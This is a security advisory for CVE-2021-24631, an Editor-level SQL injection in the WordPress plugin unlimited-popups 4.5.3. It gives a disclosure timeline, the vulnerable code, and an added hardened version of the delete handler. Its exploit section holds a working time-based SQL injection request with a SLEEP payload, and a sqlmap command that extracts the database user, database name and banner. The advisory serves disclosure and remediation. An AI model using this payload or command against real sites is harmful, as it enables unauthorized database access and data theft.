Plugin Details
Plugin Name: wp-plugin : unlimited-popups
Affected Version : 4.5.3 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Editor
CVE Number : CVE-2021-24631
Identified by : Shreya Pohekar
Disclosure Timeline
- June 15, 2021 : Issue Identified and Disclosed to WPScan
- June 22, 2021 : Plugin Closed
- August 13, 2021 : CVE Assigned
- October 7, 2021 : Public Disclosure
Technical Details
The delete popup feature, available to the Editor and Administrator roles, takes the GET parameter did
and concatenates it directly into a SQL DELETE statement without any sanitization, validation or escaping, leading to SQL Injection.
Vulnerable Code: popuplist.php#L16
15: $delid = $_GET["did"];
16: $wpdb->query("delete from " . $table_name . " where id=" . $delid);
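For comparison, the same delete handler written the way WordPress expects it: capability check, nonce check, integer validation, and a parameterized query. This is an added example, not the plugin's own code; the function name and the nonce action 'popup_delete_nonce' are assumed, and $table_name is assumed to be built by the plugin from $wpdb->prefix.

```php
<?php
// Added example (not the plugin's code): hardened version of the delete handler.
// Assumes $table_name is built from $wpdb->prefix and that the delete link
// carries a WordPress nonce for the assumed action 'popup_delete_nonce'.
function unlimited_popups_delete_hardened( $table_name ) {
    global $wpdb;

    // Authorization: the original exposes this to Editor and above, so require
    // a capability that Editors hold rather than trusting the admin page alone.
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // CSRF protection: abort unless a valid nonce accompanies the request.
    check_admin_referer( 'popup_delete_nonce' );

    // Validation: the id must be a positive integer. absint() reduces a payload
    // such as "1 AND (SELECT ...)" to 1, so the SQL tail never survives.
    $delid = isset( $_GET['did'] ) ? absint( wp_unslash( $_GET['did'] ) ) : 0;
    if ( 0 === $delid ) {
        wp_die( 'Invalid popup id.' );
    }

    // Parameterization: %d binds the value as an integer instead of string
    // concatenation, which is what line 16 of popuplist.php got wrong.
    $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table_name} WHERE id = %d", $delid )
    );
}
```

$wpdb->delete( $table_name, array( 'id' => $delid ), array( '%d' ) ) is an equivalent, shorter form once the id has been validated.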
PoC Screenshot
Exploit
GET /wp-admin/admin.php?page=popup&info=del&did=1 AND (SELECT 4420 FROM (SELECT(SLEEP(5)))yVXX) HTTP/1.1
Host: 172.28.128.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.50/wp-admin/admin.php?page=popup
Connection: close
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7Cd369b0fc734febbd56e02a2729ea1e89ed8bdef88858aa2bf66244e80af40313; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7C52b09dc0a0cd88faff03e9a9bce98b1cace6dcf841b17fe668c52d49083ff760; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623063303
Upgrade-Insecure-Requests: 1
SQLMap Command
sqlmap -r popup.req --dbms mysql --current-user --current-db -b -p did --batch --flush-session